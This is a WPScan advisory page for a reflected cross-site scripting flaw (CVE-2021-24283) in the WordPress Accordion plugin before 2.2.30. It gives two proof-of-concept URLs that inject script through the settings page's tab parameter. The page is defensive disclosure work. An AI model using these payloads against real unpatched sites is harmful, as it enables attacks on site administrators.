WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Accordion < 2.2.30 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The tab GET parameter of the settings page is not sanitised or escaped when being output back in an HTML attribute, leading to a reflected XSS issue.

Proof of Concept

v < 2.2.29
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a%22%3E%3Csvg%2Fonload%3Dalert%28123%29%3B%2F%2F%3E%3C%22

v < 2.2.30
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a"+onfocus%3Dalert(%2FXSS%2F)+autofocus%3Dautofocus+b%3D

Affects Plugins

accordions
Fixed in version 2.2.30

References

CVE
CVE-2021-24283

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

iohex

Submitter

iohex

Submitter twitter
iohehe
Verified

Yes

WPVDB ID
6ccd9990-e15f-4800-b499-f7c74b480051

Timeline

Publicly Published

2021-04-21 (about 1 years ago)

Added

2021-04-21 (about 1 years ago)

Last Updated

2021-04-21 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin